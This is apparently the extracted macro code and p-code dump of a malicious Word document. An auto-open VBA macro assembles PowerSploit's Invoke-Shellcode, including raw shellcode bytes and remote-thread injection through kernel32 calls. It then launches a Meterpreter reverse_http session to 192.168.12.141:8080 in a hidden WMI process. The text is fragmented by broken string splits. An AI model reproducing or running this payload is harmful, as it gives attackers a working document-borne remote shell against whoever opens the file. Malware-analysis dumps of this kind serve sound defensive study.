CJikXH = CJikXH + " 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
CJikXH = CJikXH + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
"
CJikXH = CJikXH + " 0xbb,0xe0,0x1d,0x2a,0x0a,0x"
CJikXH = CJikXH + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
CJikXH = CJikXH + "0a,"
0x80,0xfb,0"
CJikXH = CJikXH + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
CJikXH = CJikXH + "x53,0xff,0xd5,0x63,"
"
CJikXH = CJikXH + " 0x61,0x6c,0x63,0x00)"
[Byte[]] $Shell"
CJikXH = CJikXH + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
CJikXH = CJikXH + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
"
CJikXH = CJikXH + " 0x56,0x48,0x31,0xd2,0x6"
CJikXH = CJikXH + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
CJikXH = CJikXH + "b,0x52,"
0x20,0x"
CJikXH = CJikXH + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
CJikXH = CJikXH + "31,0xc9,0x48,0x31,0xc0,"
"
CJikXH = CJikXH + " 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
CJikXH = CJikXH + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
"
CJikXH = CJikXH + " 0x52,0x41,0x51,0x48,0x8b,"
CJikXH = CJikXH + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
CJikXH = CJikXH + "0x88,"
0x00,0x00"
CJikXH = CJikXH + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
CJikXH = CJikXH + ",0x8b,0x48,0x18,0x44,"
"
CJikXH = CJikXH + " 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
CJikXH = CJikXH + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
"
CJikXH = CJikXH + " 0x01,0xd6,0x4d,0x31,0xc9,0x"
CJikXH = CJikXH + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
CJikXH = CJikXH + "c1,"
0x38,0xe0,0"
CJikXH = CJikXH + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
CJikXH = CJikXH + "x75,0xd8,0x58,0x44,"
"
CJikXH = CJikXH + " 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
CJikXH = CJikXH + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
"
CJikXH = CJikXH + " 0x01,0xd0,0x41,0x8b,0x04,0x88"
CJikXH = CJikXH + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
CJikXH = CJikXH + ","
0x41,0x58,0x4"
CJikXH = CJikXH + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
CJikXH = CJikXH + "f,0xe0,0x58,0x41,"
"
CJikXH = CJikXH + " 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
CJikXH = CJikXH + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
"
CJikXH = CJikXH + " 0x00,0x00,0x00,0x00,0x00,0x48,0"
CJikXH = CJikXH + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
CJikXH = CJikXH + ""
0x6f,0x87,0xff,"
CJikXH = CJikXH + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
CJikXH = CJikXH + "0xbd,0x9d,0xff,"
"
CJikXH = CJikXH + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
CJikXH = CJikXH + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
"
CJikXH = CJikXH + " 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
CJikXH = CJikXH + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
"
CJikXH = CJikXH + " }"
if ( $PSBoundParameters['ProcessID'] )
"
CJikXH = CJikXH + " {"
$OpenProcessAddr = Get-ProcAddress "
CJikXH = CJikXH + "kernel32.dll OpenProcess"
$OpenProcessDele"
CJikXH = CJikXH + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
CJikXH = CJikXH + "2]) ([IntPtr])"
$OpenProcess = [System.Run"
CJikXH = CJikXH + "time.InteropServices.Marshal]::GetDelegateForFunct"
CJikXH = CJikXH + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
CJikXH = CJikXH + ""
$VirtualAllocExAddr = Get-ProcAddress ke"
CJikXH = CJikXH + "rnel32.dll VirtualAllocEx"
$VirtualAllocEx"
CJikXH = CJikXH + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
CJikXH = CJikXH + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
"
CJikXH = CJikXH + "$VirtualAllocEx = [System.Runtime.InteropServices."
CJikXH = CJikXH + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
CJikXH = CJikXH + "locExAddr, $VirtualAllocExDelegate)"
$Writ"
CJikXH = CJikXH + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
CJikXH = CJikXH + "WriteProcessMemory"
$WriteProcessMemoryDel"
CJikXH = CJikXH + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
CJikXH = CJikXH + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
CJikXH = CJikXH + ")"
$WriteProcessMemory = [System.Runtime.I"
CJikXH = CJikXH + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
CJikXH = CJikXH + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
CJikXH = CJikXH + "elegate)"
$CreateRemoteThreadAddr = Get-Pr"
CJikXH = CJikXH + "ocAddress kernel32.dll CreateRemoteThread"
"
CJikXH = CJikXH + " $CreateRemoteThreadDelegate = Get-DelegateType @("
CJikXH = CJikXH + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
CJikXH = CJikXH + "[UInt32], [IntPtr]) ([IntPtr])"
$CreateRem"
CJikXH = CJikXH + "oteThread = [System.Runtime.InteropServices.Marsha"
CJikXH = CJikXH + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
CJikXH = CJikXH + "eadAddr, $CreateRemoteThreadDelegate)"
$Cl"
CJikXH = CJikXH + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
CJikXH = CJikXH + "Handle"
$CloseHandleDelegate = Get-Delegat"
CJikXH = CJikXH + "eType @([IntPtr]) ([Bool])"
$CloseHandle ="
CJikXH = CJikXH + " [System.Runtime.InteropServices.Marshal]::GetDele"
CJikXH = CJikXH + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
CJikXH = CJikXH + "dleDelegate)"
if ( $Force -or $psCmdlet.Sh"
CJikXH = CJikXH + "ouldContinue( 'Do you wish to carry out your evil "
CJikXH = CJikXH + "plans?',"
"Injecting shellcode in"
CJikXH = CJikXH + "jecting into $((Get-Process -Id $ProcessId).Proces"
CJikXH = CJikXH + "sName) ($ProcessId)!" ) )
{
"
CJikXH = CJikXH + "Inject-RemoteShellcode $ProcessId"
}
"
CJikXH = CJikXH + "}"
Else
{
$VirtualAllocAddr = Ge"
CJikXH = CJikXH + "t-ProcAddress kernel32.dll VirtualAlloc"
$"
CJikXH = CJikXH + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
CJikXH = CJikXH + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
"
CJikXH = CJikXH + " $VirtualAlloc = [System.Runtime.InteropServices."
CJikXH = CJikXH + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
CJikXH = CJikXH + "locAddr, $VirtualAllocDelegate)"
$VirtualF"
CJikXH = CJikXH + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
CJikXH = CJikXH + ""
$VirtualFreeDelegate = Get-DelegateType "
CJikXH = CJikXH + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
"
CJikXH = CJikXH + "$VirtualFree = [System.Runtime.InteropServices.Mar"
CJikXH = CJikXH + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
CJikXH = CJikXH + "ddr, $VirtualFreeDelegate)"
$CreateThreadA"
CJikXH = CJikXH + "ddr = Get-ProcAddress kernel32.dll CreateThread"
"
CJikXH = CJikXH + " $CreateThreadDelegate = Get-DelegateType @("
CJikXH = CJikXH + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
CJikXH = CJikXH + "[IntPtr]) ([IntPtr])"
$CreateThread = [Sys"
CJikXH = CJikXH + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
CJikXH = CJikXH + "orFunctionPointer($CreateThreadAddr, $CreateThread"
CJikXH = CJikXH + "Delegate)"
$WaitForSingleObjectAddr = Get-"
CJikXH = CJikXH + "ProcAddress kernel32.dll WaitForSingleObject"
"
CJikXH = CJikXH + " $WaitForSingleObjectDelegate = Get-DelegateTyp"
CJikXH = CJikXH + "e @([IntPtr], [Int32]) ([Int])"
$WaitForSi"
CJikXH = CJikXH + "ngleObject = [System.Runtime.InteropServices.Marsh"
CJikXH = CJikXH + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
CJikXH = CJikXH + "bjectAddr, $WaitForSingleObjectDelegate)"
"
CJikXH = CJikXH + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
CJikXH = CJikXH + "wish to carry out your evil plans?',"
"
CJikXH = CJikXH + " "Injecting shellcode into the running PowerSh"
CJikXH = CJikXH + "ell process!" ) )
{
Inject-L"
CJikXH = CJikXH + "ocalShellcode"
}
}
}
Invoke-Shell"
CJikXH = CJikXH + "code -Payload windows/meterpreter/reverse_http -Lh"
CJikXH = CJikXH + "ost 192.168.12.141 -Lport 8080 -Force"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create CJikXH, Null, objConfig, intProcessID
End Function
' Processing file: /tmp/qstore_uuhn9p8y
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1127 bytes
' Macros/VBA/NewMacros - 57861 bytes
' Line #0:
' FuncDefn (Sub Auto_Open())
' Line #1:
' ArgsCall asTf 0x0000
' Line #2:
' EndSub
' Line #3:
' Line #4:
' FuncDefn (Sub AutoOpen())
' Line #5:
' ArgsCall asTf 0x0000
' Line #6:
' EndSub
' Line #7:
' Line #8:
' FuncDefn (Sub Document_Open())
' Line #9:
' ArgsCall asTf 0x0000
' Line #10:
' EndSub
' Line #11:
' Line #12:
' FuncDefn (Public Function asTf() As Variant)
' Line #13:
' Dim
' VarDefn CJikXH (As String)
' Line #14:
' LitStr 0x0019 "function Invoke-Shellcode"
' St CJikXH
' Line #15:
' Reparse 0x0001 "{"
' Line #16:
' Reparse 0x0015 "[CmdletBinding( Defa""
' Line #17:
' Ld CJikXH
' LitStr 0x0032 "ultParameterSetName = 'RunLocal', SupportsShouldPr"
' Add
' St CJikXH
' Line #18:
' Ld CJikXH
' LitStr 0x0030 "ocess = $True , ConfirmImpact = 'High')] Param ("
' Add
' St CJikXH
' Line #19:
' Reparse 0x0001 """
' Line #20:
' Ld CJikXH
' LitStr 0x001E " [ValidateNotNullOrEmpty()]"
' Add
' St CJikXH
' Line #21:
' ArgsCall [UInt16] 0x0000
' Line #22:
' Reparse 0x0005 " ""
' Line #23:
' Ld CJikXH
' LitStr 0x000B "$ProcessID,"
' Add
' St CJikXH
' Line #24:
' Reparse 0x0026 " [Parameter( ParameterSetName = 'R""
' Line #25:
…